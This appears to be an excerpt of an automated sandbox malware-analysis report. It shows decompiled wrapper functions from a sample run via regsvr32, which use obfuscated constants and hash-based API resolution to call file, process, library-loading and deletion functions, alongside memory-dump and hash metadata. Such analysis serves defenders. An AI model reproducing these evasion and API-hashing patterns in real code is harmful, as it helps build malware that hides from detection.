                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ijp
                                                                                                                • API String ID: 1725840886-2001787820
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 513 98338b-983454 call 989e7d call 99bff0 SHFileOperationW
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0098338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t46;
                                                                                                                				int _t58;
                                                                                                                				signed int _t60;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				E00989E7D(_t46);
                                                                                                                				_v28 = _v28 & 0x00000000;
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v32 = 0x221b15;
                                                                                                                				_v20 = 0x156690;
                                                                                                                				_t60 = 5;
                                                                                                                				_v20 = _v20 * 0x69;
                                                                                                                				_v20 = _v20 ^ 0x08c90ac4;
                                                                                                                				_v12 = 0x1a8107;
                                                                                                                				_v12 = _v12 / _t60;
                                                                                                                				_v12 = _v12 | 0x5e0d12b3;
                                                                                                                				_v12 = _v12 * 0x36;
                                                                                                                				_v12 = _v12 ^ 0xd6d73012;
                                                                                                                				_v8 = 0x305b7c;
                                                                                                                				_v8 = _v8 + 0xffffaa6a;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 | 0xeac0b19d;
                                                                                                                				_v8 = _v8 ^ 0xeaf3a664;
                                                                                                                				_v16 = 0x5b8d10;
                                                                                                                				_v16 = _v16 * 0x69;
                                                                                                                				_v16 = _v16 + 0x95d4;
                                                                                                                				_v16 = _v16 ^ 0x258da45e;
                                                                                                                				E0099BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
                                                                                                                				_t58 = SHFileOperationW(_a4); // executed
                                                                                                                				return _t58;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 0098344F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: |[0
                                                                                                                • API String ID: 3080627654-3711761429
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0099E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t41;
                                                                                                                				int _t51;
                                                                                                                				signed int _t53;
                                                                                                                				void* _t58;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t58 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E00989E7D(_t41);
                                                                                                                				_v20 = 0xc362e1;
                                                                                                                				_v20 = _v20 + 0xffff2419;
                                                                                                                				_v20 = _v20 + 0xffff15b9;
                                                                                                                				_v20 = _v20 ^ 0x00c90db5;
                                                                                                                				_v16 = 0x370fa8;
                                                                                                                				_v16 = _v16 + 0x3ddc;
                                                                                                                				_v16 = _v16 + 0xfffffca4;
                                                                                                                				_v16 = _v16 ^ 0x003af0ce;
                                                                                                                				_v8 = 0x58cda3;
                                                                                                                				_t53 = 0x37;
                                                                                                                				_v8 = _v8 / _t53;
                                                                                                                				_v8 = _v8 | 0xee3498e5;
                                                                                                                				_v8 = _v8 + 0xffff3fab;
                                                                                                                				_v8 = _v8 ^ 0xee3595ac;
                                                                                                                				_v12 = 0xe7384d;
                                                                                                                				_v12 = _v12 + 0x2a59;
                                                                                                                				_v12 = _v12 * 0x31;
                                                                                                                				_v12 = _v12 ^ 0x2c4bf561;
                                                                                                                				E0099BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
                                                                                                                				_t51 = CloseHandle(_t58); // executed
                                                                                                                				return _t51;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00993F2A,00000000), ref: 0099E42F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: M8
                                                                                                                • API String ID: 2962429428-669864304
                                                                                                                • Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction ID: e0a2d3f0ba47aa1c577ee173fcc567427f681cf14c684c83cd36cca81d50a939
                                                                                                                • Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction Fuzzy Hash: AF1159B5D00209FFDF58DFA4C94989EBBB4EB40324F108299E824B6291D7B55B058F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E009946E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t55;
                                                                                                                				int _t64;
                                                                                                                				signed int _t66;
                                                                                                                				struct _PROCESS_INFORMATION* _t72;
                                                                                                                
                                                                                                                				_push(_a68);
                                                                                                                				_t72 = __edx;
                                                                                                                				_push(_a64);
                                                                                                                				_push(_a60);
                                                                                                                				_push(_a56);
                                                                                                                				_push(0);
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(0);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				_push(__edx);
                                                                                                                				E00989E7D(_t55);
                                                                                                                				_v8 = 0x728488;
                                                                                                                				_v8 = _v8 + 0x86b5;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 + 0xe7c2;
                                                                                                                				_v8 = _v8 ^ 0x98526b3c;
                                                                                                                				_v16 = 0xdd86ac;
                                                                                                                				_v16 = _v16 | 0x9093749e;
                                                                                                                				_v16 = _v16 + 0x773d;
                                                                                                                				_v16 = _v16 ^ 0x90e3102d;
                                                                                                                				_v20 = 0xa04379;
                                                                                                                				_v20 = _v20 + 0xe8c2;
                                                                                                                				_v20 = _v20 ^ 0x00a70f96;
                                                                                                                				_v12 = 0x20815c;
                                                                                                                				_t66 = 0x4c;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xbbf973da;
                                                                                                                				_v12 = _v12 ^ 0xbbf5b48f;
                                                                                                                				E0099BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
                                                                                                                				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
                                                                                                                				return _t64;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 009947CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction ID: 1527d46e88213b0e5d177ae504deafafa3b4c0b47ddf6cc7ec9c121ef4737e32
                                                                                                                • Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction Fuzzy Hash: 1531F272900248FBDF559F95DD09CDEBF76FB89314F008188FA2462220D7B69A60EF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E0099BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t47;
                                                                                                                				void* _t55;
                                                                                                                				long _t60;
                                                                                                                
                                                                                                                				_push(_a40);
                                                                                                                				_t60 = __edx;
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00989E7D(_t47);
                                                                                                                				_v20 = 0x8eb723;
                                                                                                                				_v20 = _v20 + 0xdb15;
                                                                                                                				_v20 = _v20 ^ 0x00852a30;
                                                                                                                				_v16 = 0x113147;
                                                                                                                				_v16 = _v16 >> 0xc;
                                                                                                                				_v16 = _v16 << 0xa;
                                                                                                                				_v16 = _v16 ^ 0x0008263d;
                                                                                                                				_v12 = 0x276480;
                                                                                                                				_v12 = _v12 + 0x6f6f;
                                                                                                                				_v12 = _v12 | 0x7ba60f09;
                                                                                                                				_v12 = _v12 * 0x1e;
                                                                                                                				_v12 = _v12 ^ 0x7da9aca6;
                                                                                                                				_v8 = 0x62f42b;
                                                                                                                				_v8 = _v8 >> 0xc;
                                                                                                                				_v8 = _v8 << 3;
                                                                                                                				_v8 = _v8 >> 3;
                                                                                                                				_v8 = _v8 ^ 0x000dc6a5;
                                                                                                                				E0099BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
                                                                                                                				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
                                                                                                                				return _t55;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 0099BFE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction ID: 6c4923c7645590d22a528ee0593711693675b9e72400f05ffa94a618cddb0fcd
                                                                                                                • Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction Fuzzy Hash: 7221E57680020DBBCF15DF96D9498DFBFB5FB84748F108198F925A2221D3B68A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00991B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t44;
                                                                                                                				void* _t55;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t62;
                                                                                                                				long _t63;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t62 = __edx;
                                                                                                                				_t63 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00989E7D(_t44);
                                                                                                                				_v12 = 0x22ab7;
                                                                                                                				_t57 = 0x25;
                                                                                                                				_v12 = _v12 * 0x37;
                                                                                                                				_v12 = _v12 / _t57;
                                                                                                                				_v12 = _v12 + 0xd1d9;
                                                                                                                				_v12 = _v12 ^ 0x00090b04;
                                                                                                                				_v16 = 0xc8cc57;
                                                                                                                				_v16 = _v16 >> 0x10;
                                                                                                                				_v16 = _v16 + 0xffff2520;
                                                                                                                				_v16 = _v16 ^ 0xfffe92e9;
                                                                                                                				_v20 = 0xc52a4b;
                                                                                                                				_v20 = _v20 | 0xae757bf4;
                                                                                                                				_v20 = _v20 ^ 0xaef18991;
                                                                                                                				_v8 = 0xf15120;
                                                                                                                				_v8 = _v8 ^ 0xeebb54a4;
                                                                                                                				_v8 = _v8 << 7;
                                                                                                                				_v8 = _v8 * 0x37;
                                                                                                                				_v8 = _v8 ^ 0xf39e7cda;
                                                                                                                				E0099BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
                                                                                                                				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
                                                                                                                				return _t55;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 00991BE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction ID: 0a0a9db021efeaef299bcc91a6fd6d079e4e85a527879b8c30eb161d2ec6429d
                                                                                                                • Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction Fuzzy Hash: 6E2133B5D00208FBDF05DFA5C94A8EEBFB5FB80714F108089E915A6261D3B45B41DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E009966C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t39;
                                                                                                                				intOrPtr* _t45;
                                                                                                                				void* _t46;
                                                                                                                				void* _t51;
                                                                                                                
                                                                                                                				_t51 = __edx;
                                                                                                                				E00989E7D(_t39);
                                                                                                                				_v12 = 0xe2acc8;
                                                                                                                				_v12 = _v12 >> 3;
                                                                                                                				_v12 = _v12 + 0xbe17;
                                                                                                                				_v12 = _v12 ^ 0x0011993b;
                                                                                                                				_v20 = 0xf2f568;
                                                                                                                				_v20 = _v20 << 0xe;
                                                                                                                				_v20 = _v20 ^ 0xbd5142c5;
                                                                                                                				_v8 = 0x6d1128;
                                                                                                                				_v8 = _v8 + 0xffff2279;
                                                                                                                				_v8 = _v8 << 3;
                                                                                                                				_v8 = _v8 << 0xc;
                                                                                                                				_v8 = _v8 ^ 0x19de445b;
                                                                                                                				_v16 = 0xb26540;
                                                                                                                				_v16 = _v16 + 0xffff3889;
                                                                                                                				_v16 = _v16 ^ 0x00b459c6;
                                                                                                                				_t45 = E0099BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
                                                                                                                				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
                                                                                                                				return _t46;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 00996777
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction ID: 9be74d531d55f2f7979c4c5a0423ad5998279bf0a76726e59e7e3ee6c9a7ba50
                                                                                                                • Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction Fuzzy Hash: 3C1142B2800208FBCF15DFA5CC0A8DEBFB8EF85704F108198E92962211D3B18A64DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E0098FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t36;
                                                                                                                				struct HINSTANCE__* _t47;
                                                                                                                				signed int _t49;
                                                                                                                				signed int _t50;
                                                                                                                				WCHAR* _t57;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_t57 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E00989E7D(_t36);
                                                                                                                				_v20 = 0x4781cd;
                                                                                                                				_t49 = 7;
                                                                                                                				_v20 = _v20 / _t49;
                                                                                                                				_v20 = _v20 ^ 0x0004a997;
                                                                                                                				_v8 = 0x9f6121;
                                                                                                                				_v8 = _v8 | 0x04abbfea;
                                                                                                                				_v8 = _v8 ^ 0x44133d53;
                                                                                                                				_v8 = _v8 ^ 0x40a32c45;
                                                                                                                				_v16 = 0x791f5b;
                                                                                                                				_t50 = 0x6e;
                                                                                                                				_v16 = _v16 / _t50;
                                                                                                                				_v16 = _v16 ^ 0x000d135a;
                                                                                                                				_v12 = 0x90c5d0;
                                                                                                                				_v12 = _v12 ^ 0x2cafc93f;
                                                                                                                				_v12 = _v12 ^ 0x2c381e09;
                                                                                                                				E0099BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
                                                                                                                				_t47 = LoadLibraryW(_t57); // executed
                                                                                                                				return _t47;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0098FD58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction ID: 568746016d74270856a637dfe886c69ece092804acce6a93ee149ed6160dca80
                                                                                                                • Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction Fuzzy Hash: 65112A71E00218FBDB18DFA5D84A9EEBFB5EB44304F108189E42AA6251DBB56B148B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00989EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t35;
                                                                                                                				int _t42;
                                                                                                                				WCHAR* _t46;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t46 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E00989E7D(_t35);
                                                                                                                				_v20 = 0xb0cce;
                                                                                                                				_v20 = _v20 + 0xffff00ee;
                                                                                                                				_v20 = _v20 ^ 0x0007bd05;
                                                                                                                				_v12 = 0x1e8fca;
                                                                                                                				_v12 = _v12 >> 6;
                                                                                                                				_v12 = _v12 << 8;
                                                                                                                				_v12 = _v12 + 0xffff1da9;
                                                                                                                				_v12 = _v12 ^ 0x0077171f;
                                                                                                                				_v16 = 0xc679b7;
                                                                                                                				_v16 = _v16 + 0x38bf;
                                                                                                                				_v16 = _v16 ^ 0x00cf762a;
                                                                                                                				_v8 = 0xa3ba51;
                                                                                                                				_v8 = _v8 ^ 0xa0d3ead1;
                                                                                                                				_v8 = _v8 + 0xe688;
                                                                                                                				_v8 = _v8 + 0xffff6d73;
                                                                                                                				_v8 = _v8 ^ 0xa079263d;
                                                                                                                				E0099BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
                                                                                                                				_t42 = DeleteFileW(_t46); // executed
                                                                                                                				return _t42;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 00989F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction ID: f184f05af987e18dc299ae25cfb1e857f6ca8865f246574b5f511f3d77954483
                                                                                                                • Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction Fuzzy Hash: 96111CB1C11619FBDF44DFA4D94A4DEBBB4EF10318F108288E81566251E7B45B548F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E0098BA9C(int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				unsigned int _v20;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_v20 = 0x6b4597;
                                                                                                                				_v20 = _v20 >> 2;
                                                                                                                				_v20 = _v20 ^ 0x00116e69;
                                                                                                                				_v16 = 0x7d3df7;
                                                                                                                				_v16 = _v16 << 3;
                                                                                                                				_v16 = _v16 ^ 0x03ee9fa4;
                                                                                                                				_v12 = 0x7e0c35;
                                                                                                                				_v12 = _v12 ^ 0xa2581e84;
                                                                                                                				_v12 = _v12 ^ 0xa22bc007;
                                                                                                                				_v8 = 0xada9ee;
                                                                                                                				_push(_t34);
                                                                                                                				_v8 = _v8 * 0x61;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 ^ 0x6b103fde;
                                                                                                                				E0099BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
                                                                                                                				ExitProcess(_a12);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00116E69), ref: 0098BB1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction ID: 0739f03a8d3d29aab7368d8ed7f4ee5a2da977d4ac7c0304dc388f9b215ffec2
                                                                                                                • Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction Fuzzy Hash: BC010475D1120CEB8F04DFA8DA4A9DEBBB4FB04348F108599E821B7211D7B55B04CF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1056
                                                                                                                Total number of Limit Nodes:16
